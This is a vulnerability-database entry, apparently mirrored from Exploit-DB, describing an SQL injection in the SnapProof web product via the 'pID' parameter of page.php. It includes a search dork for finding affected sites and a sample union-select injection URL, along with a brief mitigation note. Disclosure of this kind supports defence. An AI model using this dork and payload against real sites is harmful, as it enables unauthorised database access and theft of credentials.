header-logo
Suggest Exploit
vendor:
SnapProof
by:
AtT4CKxT3rR0r1ST
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SnapProof
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

SnapProof (page.php) Sql Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable page.php script. The attacker can use the 'pID' parameter to inject malicious SQL code into the query. This can allow the attacker to gain access to sensitive information from the database, such as user credentials and other confidential data.

Mitigation:

Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

SnapProof (page.php) Sql Injection Vulnerability 
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.snapproof.com/
.:. Dork           : "Created and powered by SnapProof"
####################################################################

===[ Exploit ]===

www.site.com/page.php?pID=null[Sql]

www.site.com/page.php?pID=null+and+1=2+union+select+1,2,3,4
####################################################################

Navigation

Suggest Exploit

Services By CQR